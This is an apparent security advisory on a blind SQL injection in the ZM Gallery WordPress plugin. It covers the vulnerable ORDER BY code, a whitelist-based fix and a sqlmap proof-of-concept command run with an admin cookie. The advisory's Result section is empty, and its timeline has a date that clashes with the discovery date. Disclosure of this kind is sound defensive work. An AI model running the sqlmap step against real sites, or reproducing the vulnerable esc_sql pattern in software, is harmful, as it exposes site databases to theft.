Homepage:
https://wordpress.org/plugins/zm-gallery/
Description:
Required user access: admin user.
$_GET['order'] (and $_GET['orderby']) is sanitized with esc_sql(), which only escapes characters for use inside a quoted string literal; in an unquoted ORDER BY clause it offers no protection, so the parameter is exploitable via blind SQL injection.
File / Code:
Path: /wp-content/plugins/zm-gallery/zm-gallery-list.php
Line: 126
if( isset($_GET['orderby']) ) {
    // esc_sql() only escapes quote characters; in an unquoted identifier
    // context such as ORDER BY the request value is passed through unchanged.
    $order = ' ORDER BY ' . esc_sql($_GET['orderby']);
    if( isset($_GET['order']) ) {
        $order .= ' ' . esc_sql($_GET['order']);
    }
}
$table_name = $wpdb->prefix . 'zm_gallery';
// $order is concatenated directly into the query string.
$gallery = $wpdb->get_results("SELECT * FROM $table_name " . $order );
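A hardened form of the same listing query, added here as an example and not the plugin's own code: the sort column and direction are validated against a fixed whitelist before being concatenated, instead of being passed through esc_sql(). The helper name zm_gallery_build_order_clause and the column names id and date are assumptions for illustration; $wpdb, the name column and the zm_gallery table come from the page.

```php
<?php
// Added example (not the plugin's code). Assumes the global WordPress $wpdb
// object and a zm_gallery table whose sortable columns are listed in
// $allowed_columns (the names id and date are assumed, name is from the page).

function zm_gallery_build_order_clause( array $get, array $allowed_columns ) {
    $order = '';
    // Only accept a column that appears verbatim in the whitelist; strict
    // comparison so that values like "0" or a numeric-looking string never match.
    if ( isset( $get['orderby'] ) && in_array( $get['orderby'], $allowed_columns, true ) ) {
        $column = $get['orderby'];
        // The direction is reduced to one of two literals; anything else is ASC.
        $direction = 'ASC';
        if ( isset( $get['order'] ) && strtoupper( (string) $get['order'] ) === 'DESC' ) {
            $direction = 'DESC';
        }
        // Both fragments originate from fixed strings in this function, never
        // from the request, so concatenation into the query is safe.
        $order = " ORDER BY `{$column}` {$direction}";
    }
    return $order;
}

$allowed_columns = array( 'id', 'name', 'date' ); // assumed column names
$order      = zm_gallery_build_order_clause( $_GET, $allowed_columns );
$table_name = $wpdb->prefix . 'zm_gallery';
$gallery    = $wpdb->get_results( "SELECT * FROM {$table_name}" . $order );
```

With this check in place an orderby or order value that is not on the whitelist simply yields an unsorted result set, so the blind injection probes in the proof of concept below are never reflected into SQL. WordPress core also ships sanitize_sql_orderby(), which rejects values that do not match a "column ASC/DESC" pattern, but a whitelist of the table's real column names is the stricter option.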
Proof of Concept:
1 – Login with admin user.
2 – Use sqlmap;
python sqlmap.py -u "http://target/wp-admin/admin.php?page=zm_gallery&orderby=name&order=desc" --dbs --cookie="cookie of admin user" --level=5 --dbms=Mysql
3 – Result:
Timeline:
- 14/12/2016 – Discovered
- 13/12/2016 – Vendor could not be found